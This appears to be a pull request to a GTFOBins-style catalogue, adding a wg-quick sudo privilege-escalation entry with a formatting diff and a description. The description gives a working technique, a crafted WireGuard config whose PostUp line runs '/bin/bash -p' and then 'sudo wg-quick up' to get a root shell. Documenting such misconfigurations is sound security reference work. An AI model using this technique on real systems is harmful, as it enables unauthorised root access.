### PR TITLE
Add `wg-quick` sudo priv escalation

### DIFF
--- a/_gtfobins/wg-quick.md
+++ b/_gtfobins/wg-quick.md
@@ -1,11 +1,12 @@
 ---
-description: If the `wg-quick` binary is allowed via `sudo`, it can be abused to create a fake configuration which allows executing commands with root privileges.
+description: |
+  If the `wg-quick` binary is allowed via `sudo`, it can be abused to create a fake configuration which allows executing commands with root privileges.
 
-This example creates a fake config parsed and loaded by `wg-quick`, allowing for obtaining a full reserve shell with root privileges. Note that here, `netcat` will be used, but of course, there are plenty of payloads you can replace to obtain the same.
+  This example creates a fake config parsed and loaded by `wg-quick`, allowing for obtaining a full reserve shell with root privileges. Note that here, `netcat` will be used, but of course, there are plenty of payloads you can replace to obtain the same.
 
 functions:
   sudo:
-    - description:
+    - description: |
         If the `sudo -l` shows such a binary in the output
 
         ```
@@ -14,7 +15,7 @@ functions:
 
         This feature can be abused.
 
-      code:
+      code: |
         Exploit,
 
         ```


### PR DESCRIPTION
Hello, the following P.R:

- Adds an exploitation technique to elevate privileges whenever `wg-quick` binary can be run as `sudo`

### Description

If the `wg-quick` binary is allowed via `sudo`, it can be abused to create a fake configuration which allows executing commands with root privileges.

This example creates a fake config parsed and loaded by `wg-quick`, allowing for obtaining a full shell with root privileges.

### Exploitation

If the `sudo -l` shows such a binary in the output

```
(ALL) PASSWD: /usr/bin/wg-quick,
```

This feature can be abused.

```
cat << EOF > ./wg1.conf
[Interface]
ListenPort = 51821
PrivateKey = yNwWXHO7oIDQo/b5eS5R0xdVidxm50AwuQoIKTOGy1g=

PostUp = /bin/bash -p

EOF
```

`sudo wg-quick up ./wg1.conf`

This will directly drop to a `root` shell.

```
# whoami
root
```